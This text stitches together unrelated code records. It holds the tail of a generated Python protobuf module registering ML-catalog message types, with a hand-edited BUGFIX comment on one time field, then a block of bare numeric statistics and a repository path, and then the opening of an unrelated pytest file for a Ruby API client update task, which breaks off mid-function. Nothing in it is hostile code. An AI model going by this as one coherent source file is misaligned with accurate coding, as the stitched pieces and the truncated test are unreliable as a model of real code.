_REGION.fields_by_name['datacenters'].message_type = _DATACENTER
_RESOURCESPEC.fields_by_name['requirements'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._RESOURCEREQUIREMENTS
_ROCAUCCURVE.fields_by_name['values'].message_type = _CURVEPOINT
_RUNSCHEDULE.fields_by_name['startTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
# BUGFIX: endTime was linked to meta/v1 _TIMESTAMP, a different message from
# meta/v1 _TIME. Every other time field in this file (startTime above,
# lastPredictionTime/deployedAt/releasedAt/approvedAt) links to _TIME, and the
# modelaapi RunSchedule declares start/end symmetrically as meta/v1.Time; a
# mismatched descriptor here breaks (de)serialization of RunSchedule.endTime.
_RUNSCHEDULE.fields_by_name['endTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_USERROLECLASS.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_USERROLECLASS.fields_by_name['spec'].message_type = _USERROLECLASSSPEC
_USERROLECLASSLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_USERROLECLASSLIST.fields_by_name['items'].message_type = _USERROLECLASS
_USERROLECLASSSPEC.fields_by_name['rules'].message_type = k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2._POLICYRULE
_WORKLOADCLASS.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_WORKLOADCLASS.fields_by_name['spec'].message_type = _WORKLOADCLASSSPEC
_WORKLOADCLASSLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_WORKLOADCLASSLIST.fields_by_name['items'].message_type = _WORKLOADCLASS
_WORKLOADCLASSSPEC.fields_by_name['resourcesTemplate'].message_type = _RESOURCESPEC
_WORKLOADCLASSSPEC.fields_by_name['libs'].message_type = _LIB
# Register every top-level message descriptor on the file descriptor by its
# proto message name, then register the completed file with the symbol
# database so message classes can be built and looked up by full name.
DESCRIPTOR.message_types_by_name['Algorithm'] = _ALGORITHM
DESCRIPTOR.message_types_by_name['AlgorithmList'] = _ALGORITHMLIST
DESCRIPTOR.message_types_by_name['AlgorithmSpec'] = _ALGORITHMSPEC
DESCRIPTOR.message_types_by_name['CategoricalParameter'] = _CATEGORICALPARAMETER
DESCRIPTOR.message_types_by_name['Cloud'] = _CLOUD
DESCRIPTOR.message_types_by_name['CloudList'] = _CLOUDLIST
DESCRIPTOR.message_types_by_name['CloudSpec'] = _CLOUDSPEC
DESCRIPTOR.message_types_by_name['CloudStatus'] = _CLOUDSTATUS
DESCRIPTOR.message_types_by_name['CompilerSpec'] = _COMPILERSPEC
DESCRIPTOR.message_types_by_name['ConfusionMatrix'] = _CONFUSIONMATRIX
DESCRIPTOR.message_types_by_name['ConfusionMatrixRow'] = _CONFUSIONMATRIXROW
DESCRIPTOR.message_types_by_name['CurvePoint'] = _CURVEPOINT
DESCRIPTOR.message_types_by_name['DataCenter'] = _DATACENTER
DESCRIPTOR.message_types_by_name['FloatParameter'] = _FLOATPARAMETER
DESCRIPTOR.message_types_by_name['GithubEvents'] = _GITHUBEVENTS
DESCRIPTOR.message_types_by_name['GpuClass'] = _GPUCLASS
DESCRIPTOR.message_types_by_name['GpuClassCost'] = _GPUCLASSCOST
DESCRIPTOR.message_types_by_name['IntParameter'] = _INTPARAMETER
DESCRIPTOR.message_types_by_name['Lib'] = _LIB
DESCRIPTOR.message_types_by_name['Logs'] = _LOGS
DESCRIPTOR.message_types_by_name['MLFramework'] = _MLFRAMEWORK
DESCRIPTOR.message_types_by_name['MLFrameworkList'] = _MLFRAMEWORKLIST
DESCRIPTOR.message_types_by_name['MLFrameworkSpec'] = _MLFRAMEWORKSPEC
DESCRIPTOR.message_types_by_name['MachineClass'] = _MACHINECLASS
DESCRIPTOR.message_types_by_name['MachineClassCost'] = _MACHINECLASSCOST
DESCRIPTOR.message_types_by_name['Measurement'] = _MEASUREMENT
DESCRIPTOR.message_types_by_name['ModelDeploymentSpec'] = _MODELDEPLOYMENTSPEC
DESCRIPTOR.message_types_by_name['ModelDeploymentStatus'] = _MODELDEPLOYMENTSTATUS
DESCRIPTOR.message_types_by_name['NotificationSpec'] = _NOTIFICATIONSPEC
DESCRIPTOR.message_types_by_name['PRCurve'] = _PRCURVE
DESCRIPTOR.message_types_by_name['PretrainedModel'] = _PRETRAINEDMODEL
DESCRIPTOR.message_types_by_name['PretrainedModelList'] = _PRETRAINEDMODELLIST
DESCRIPTOR.message_types_by_name['PretrainedModelSpec'] = _PRETRAINEDMODELSPEC
DESCRIPTOR.message_types_by_name['PublicDataset'] = _PUBLICDATASET
DESCRIPTOR.message_types_by_name['PublicDatasetList'] = _PUBLICDATASETLIST
DESCRIPTOR.message_types_by_name['PublicDatasetSpec'] = _PUBLICDATASETSPEC
DESCRIPTOR.message_types_by_name['Region'] = _REGION
DESCRIPTOR.message_types_by_name['ResourceSpec'] = _RESOURCESPEC
DESCRIPTOR.message_types_by_name['RocAucCurve'] = _ROCAUCCURVE
DESCRIPTOR.message_types_by_name['RunSchedule'] = _RUNSCHEDULE
DESCRIPTOR.message_types_by_name['StakeHolder'] = _STAKEHOLDER
DESCRIPTOR.message_types_by_name['UserRoleClass'] = _USERROLECLASS
DESCRIPTOR.message_types_by_name['UserRoleClassList'] = _USERROLECLASSLIST
DESCRIPTOR.message_types_by_name['UserRoleClassSpec'] = _USERROLECLASSSPEC
DESCRIPTOR.message_types_by_name['VizUri'] = _VIZURI
DESCRIPTOR.message_types_by_name['WorkloadClass'] = _WORKLOADCLASS
DESCRIPTOR.message_types_by_name['WorkloadClassList'] = _WORKLOADCLASSLIST
DESCRIPTOR.message_types_by_name['WorkloadClassSpec'] = _WORKLOADCLASSSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Algorithm = _reflection.GeneratedProtocolMessageType('Algorithm', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHM,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm)
})
_sym_db.RegisterMessage(Algorithm)
AlgorithmList = _reflection.GeneratedProtocolMessageType('AlgorithmList', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHMLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList)
})
_sym_db.RegisterMessage(AlgorithmList)
AlgorithmSpec = _reflection.GeneratedProtocolMessageType('AlgorithmSpec', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHMSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec)
})
_sym_db.RegisterMessage(AlgorithmSpec)
CategoricalParameter = _reflection.GeneratedProtocolMessageType('CategoricalParameter', (_message.Message,), {
'DESCRIPTOR' : _CATEGORICALPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter)
})
_sym_db.RegisterMessage(CategoricalParameter)
Cloud = _reflection.GeneratedProtocolMessageType('Cloud', (_message.Message,), {
'DESCRIPTOR' : _CLOUD,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud)
})
_sym_db.RegisterMessage(Cloud)
CloudList = _reflection.GeneratedProtocolMessageType('CloudList', (_message.Message,), {
'DESCRIPTOR' : _CLOUDLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudList)
})
_sym_db.RegisterMessage(CloudList)
CloudSpec = _reflection.GeneratedProtocolMessageType('CloudSpec', (_message.Message,), {
'DESCRIPTOR' : _CLOUDSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec)
})
_sym_db.RegisterMessage(CloudSpec)
CloudStatus = _reflection.GeneratedProtocolMessageType('CloudStatus', (_message.Message,), {
'DESCRIPTOR' : _CLOUDSTATUS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus)
})
_sym_db.RegisterMessage(CloudStatus)
CompilerSpec = _reflection.GeneratedProtocolMessageType('CompilerSpec', (_message.Message,), {
'DESCRIPTOR' : _COMPILERSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CompilerSpec)
})
_sym_db.RegisterMessage(CompilerSpec)
ConfusionMatrix = _reflection.GeneratedProtocolMessageType('ConfusionMatrix', (_message.Message,), {
'DESCRIPTOR' : _CONFUSIONMATRIX,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrix)
})
_sym_db.RegisterMessage(ConfusionMatrix)
ConfusionMatrixRow = _reflection.GeneratedProtocolMessageType('ConfusionMatrixRow', (_message.Message,), {
'DESCRIPTOR' : _CONFUSIONMATRIXROW,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ConfusionMatrixRow)
})
_sym_db.RegisterMessage(ConfusionMatrixRow)
CurvePoint = _reflection.GeneratedProtocolMessageType('CurvePoint', (_message.Message,), {
'DESCRIPTOR' : _CURVEPOINT,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CurvePoint)
})
_sym_db.RegisterMessage(CurvePoint)
DataCenter = _reflection.GeneratedProtocolMessageType('DataCenter', (_message.Message,), {
'DESCRIPTOR' : _DATACENTER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.DataCenter)
})
_sym_db.RegisterMessage(DataCenter)
FloatParameter = _reflection.GeneratedProtocolMessageType('FloatParameter', (_message.Message,), {
'DESCRIPTOR' : _FLOATPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter)
})
_sym_db.RegisterMessage(FloatParameter)
GithubEvents = _reflection.GeneratedProtocolMessageType('GithubEvents', (_message.Message,), {
'DESCRIPTOR' : _GITHUBEVENTS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GithubEvents)
})
_sym_db.RegisterMessage(GithubEvents)
GpuClass = _reflection.GeneratedProtocolMessageType('GpuClass', (_message.Message,), {
'DESCRIPTOR' : _GPUCLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClass)
})
_sym_db.RegisterMessage(GpuClass)
GpuClassCost = _reflection.GeneratedProtocolMessageType('GpuClassCost', (_message.Message,), {
'DESCRIPTOR' : _GPUCLASSCOST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.GpuClassCost)
})
_sym_db.RegisterMessage(GpuClassCost)
IntParameter = _reflection.GeneratedProtocolMessageType('IntParameter', (_message.Message,), {
'DESCRIPTOR' : _INTPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter)
})
_sym_db.RegisterMessage(IntParameter)
Lib = _reflection.GeneratedProtocolMessageType('Lib', (_message.Message,), {
'DESCRIPTOR' : _LIB,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Lib)
})
_sym_db.RegisterMessage(Lib)
Logs = _reflection.GeneratedProtocolMessageType('Logs', (_message.Message,), {
'DESCRIPTOR' : _LOGS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Logs)
})
_sym_db.RegisterMessage(Logs)
MLFramework = _reflection.GeneratedProtocolMessageType('MLFramework', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORK,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFramework)
})
_sym_db.RegisterMessage(MLFramework)
MLFrameworkList = _reflection.GeneratedProtocolMessageType('MLFrameworkList', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORKLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkList)
})
_sym_db.RegisterMessage(MLFrameworkList)
MLFrameworkSpec = _reflection.GeneratedProtocolMessageType('MLFrameworkSpec', (_message.Message,), {
'DESCRIPTOR' : _MLFRAMEWORKSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MLFrameworkSpec)
})
_sym_db.RegisterMessage(MLFrameworkSpec)
MachineClass = _reflection.GeneratedProtocolMessageType('MachineClass', (_message.Message,), {
'DESCRIPTOR' : _MACHINECLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClass)
})
_sym_db.RegisterMessage(MachineClass)
MachineClassCost = _reflection.GeneratedProtocolMessageType('MachineClassCost', (_message.Message,), {
'DESCRIPTOR' : _MACHINECLASSCOST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost)
})
_sym_db.RegisterMessage(MachineClassCost)
Measurement = _reflection.GeneratedProtocolMessageType('Measurement', (_message.Message,), {
'DESCRIPTOR' : _MEASUREMENT,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement)
})
_sym_db.RegisterMessage(Measurement)
ModelDeploymentSpec = _reflection.GeneratedProtocolMessageType('ModelDeploymentSpec', (_message.Message,), {
'DESCRIPTOR' : _MODELDEPLOYMENTSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec)
})
_sym_db.RegisterMessage(ModelDeploymentSpec)
ModelDeploymentStatus = _reflection.GeneratedProtocolMessageType('ModelDeploymentStatus', (_message.Message,), {
'DESCRIPTOR' : _MODELDEPLOYMENTSTATUS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus)
})
_sym_db.RegisterMessage(ModelDeploymentStatus)
NotificationSpec = _reflection.GeneratedProtocolMessageType('NotificationSpec', (_message.Message,), {
'SelectorEntry' : _reflection.GeneratedProtocolMessageType('SelectorEntry', (_message.Message,), {
'DESCRIPTOR' : _NOTIFICATIONSPEC_SELECTORENTRY,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry)
})
,
'DESCRIPTOR' : _NOTIFICATIONSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec)
})
_sym_db.RegisterMessage(NotificationSpec)
_sym_db.RegisterMessage(NotificationSpec.SelectorEntry)
PRCurve = _reflection.GeneratedProtocolMessageType('PRCurve', (_message.Message,), {
'DESCRIPTOR' : _PRCURVE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve)
})
_sym_db.RegisterMessage(PRCurve)
PretrainedModel = _reflection.GeneratedProtocolMessageType('PretrainedModel', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODEL,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel)
})
_sym_db.RegisterMessage(PretrainedModel)
PretrainedModelList = _reflection.GeneratedProtocolMessageType('PretrainedModelList', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODELLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList)
})
_sym_db.RegisterMessage(PretrainedModelList)
PretrainedModelSpec = _reflection.GeneratedProtocolMessageType('PretrainedModelSpec', (_message.Message,), {
'DESCRIPTOR' : _PRETRAINEDMODELSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec)
})
_sym_db.RegisterMessage(PretrainedModelSpec)
PublicDataset = _reflection.GeneratedProtocolMessageType('PublicDataset', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASET,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset)
})
_sym_db.RegisterMessage(PublicDataset)
PublicDatasetList = _reflection.GeneratedProtocolMessageType('PublicDatasetList', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASETLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList)
})
_sym_db.RegisterMessage(PublicDatasetList)
PublicDatasetSpec = _reflection.GeneratedProtocolMessageType('PublicDatasetSpec', (_message.Message,), {
'DESCRIPTOR' : _PUBLICDATASETSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec)
})
_sym_db.RegisterMessage(PublicDatasetSpec)
Region = _reflection.GeneratedProtocolMessageType('Region', (_message.Message,), {
'DESCRIPTOR' : _REGION,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region)
})
_sym_db.RegisterMessage(Region)
ResourceSpec = _reflection.GeneratedProtocolMessageType('ResourceSpec', (_message.Message,), {
'DESCRIPTOR' : _RESOURCESPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec)
})
_sym_db.RegisterMessage(ResourceSpec)
RocAucCurve = _reflection.GeneratedProtocolMessageType('RocAucCurve', (_message.Message,), {
'DESCRIPTOR' : _ROCAUCCURVE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve)
})
_sym_db.RegisterMessage(RocAucCurve)
RunSchedule = _reflection.GeneratedProtocolMessageType('RunSchedule', (_message.Message,), {
'DESCRIPTOR' : _RUNSCHEDULE,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule)
})
_sym_db.RegisterMessage(RunSchedule)
StakeHolder = _reflection.GeneratedProtocolMessageType('StakeHolder', (_message.Message,), {
'DESCRIPTOR' : _STAKEHOLDER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder)
})
_sym_db.RegisterMessage(StakeHolder)
UserRoleClass = _reflection.GeneratedProtocolMessageType('UserRoleClass', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass)
})
_sym_db.RegisterMessage(UserRoleClass)
UserRoleClassList = _reflection.GeneratedProtocolMessageType('UserRoleClassList', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASSLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList)
})
_sym_db.RegisterMessage(UserRoleClassList)
UserRoleClassSpec = _reflection.GeneratedProtocolMessageType('UserRoleClassSpec', (_message.Message,), {
'DESCRIPTOR' : _USERROLECLASSSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec)
})
_sym_db.RegisterMessage(UserRoleClassSpec)
VizUri = _reflection.GeneratedProtocolMessageType('VizUri', (_message.Message,), {
'DESCRIPTOR' : _VIZURI,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri)
})
_sym_db.RegisterMessage(VizUri)
WorkloadClass = _reflection.GeneratedProtocolMessageType('WorkloadClass', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASS,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass)
})
_sym_db.RegisterMessage(WorkloadClass)
WorkloadClassList = _reflection.GeneratedProtocolMessageType('WorkloadClassList', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASSLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList)
})
_sym_db.RegisterMessage(WorkloadClassList)
WorkloadClassSpec = _reflection.GeneratedProtocolMessageType('WorkloadClassSpec', (_message.Message,), {
'DESCRIPTOR' : _WORKLOADCLASSSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec)
})
_sym_db.RegisterMessage(WorkloadClassSpec)
DESCRIPTOR._options = None
_NOTIFICATIONSPEC_SELECTORENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 50.697604
| 12,517
| 0.770259
| 19,174
| 150,217
| 5.742672
| 0.034213
| 0.042358
| 0.065752
| 0.075615
| 0.831014
| 0.80742
| 0.801008
| 0.794251
| 0.792716
| 0.779139
| 0
| 0.037389
| 0.104589
| 150,217
| 2,962
| 12,518
| 50.71472
| 0.781237
| 0.037026
| 0
| 0.718284
| 1
| 0.001091
| 0.269378
| 0.231576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003635
| 0
| 0.003635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a3afd7f341b543dc17d1d864a688fe1a8b511c75
| 20,893
|
py
|
Python
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 38
|
2017-07-20T17:54:08.000Z
|
2022-02-20T02:16:31.000Z
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 183
|
2017-03-23T17:17:24.000Z
|
2022-02-09T00:07:17.000Z
|
server/tests/test_google_api_ruby_client.py
|
cclauss/discovery-artifact-manager
|
9eb6bcef290ef87006758349c725d440fbfc85d6
|
[
"Apache-2.0"
] | 42
|
2017-03-23T19:20:20.000Z
|
2022-02-20T02:17:09.000Z
|
# Copyright 2017, Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock, call, mock_open, patch
import pytest
from tasks import _git, accounts, google_api_ruby_client
from tests import common
_RUBYGEMS_ACCOUNT = accounts.RubyGemsAccount('api_key')
@patch('tasks.google_api_ruby_client._commit_message.date')
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_update(clone_from_github_mock, check_output_mock, date_mock):
    """Verify update() regenerates the client and commits/pushes the result.

    With one ADDED, one UPDATED, and one DELETED generated file, update()
    must: clone the repo, `bundle install`, wipe and regenerate the
    `generated` tree (restoring the discovery_v1 files first), run the spec
    suite, then commit with an Add/Delete/Update summary and push.

    Note: @patch decorators apply bottom-up, so the lowest decorator
    supplies the first mock argument.
    """
    repo_mock = Mock()
    # One file of each diff status so every commit-message section appears.
    repo_mock.diff_name_status.return_value = [
        ('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
        ('generated/google/apis/bar_v1.rb', _git.Status.UPDATED),
        ('generated/google/apis/baz_v1.rb', _git.Status.DELETED)
    ]
    side_effect = common.clone_from_github_mock_side_effect(repo_mock)
    clone_from_github_mock.side_effect = side_effect
    # Pin the date embedded in the autogenerated commit message.
    date_mock.today.return_value.isoformat.return_value = '2000-01-01'
    # A parent mock records calls on all attached mocks in one ordered list,
    # letting the assertion below check cross-mock call ordering.
    manager = Mock()
    manager.attach_mock(clone_from_github_mock, 'clone_from_github')
